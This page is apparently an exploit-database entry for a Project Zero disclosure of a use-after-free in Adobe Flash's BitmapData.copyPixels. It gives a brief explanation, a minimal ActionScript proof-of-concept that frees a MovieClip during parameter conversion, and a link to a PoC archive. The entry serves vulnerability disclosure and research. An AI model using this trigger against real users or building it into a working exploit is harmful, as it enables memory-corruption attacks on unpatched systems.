Lucene search
K

Adobe Flash - BitmapData.copyPixels Use-After-Free

🗓️ 29 Aug 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt
🔗 0day.today👁 29 Views

Adobe Flash - BitmapData.copyPixels Use-After-Free vulnerabilit

Related
Code
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=843
 
There is a use-after-free in BitmapData.copyPixels. If the method is called on a MovieClip, and the MovieClip is deleted during parameter conversions, it is used to convert future parameters, even though it has already been freed. A minimal proof-of-concept follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var b = new flash.display.BitmapData(10, 10, true, 7);
var f = b.copyPixels;
mc.f = f;
mc.f( {}, { x : { valueOf : func}, y : 0, width : 10, height : 10 }, { x : 0, y :0 }, "natalie", { x : 0, y : 0});
 
 
function func(){
 
    mc.removeMovieClip();
     
    // Fix the heap 
     
    }
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40310.zip

#  0day.today [2018-01-09]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Aug 2016 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.75305
29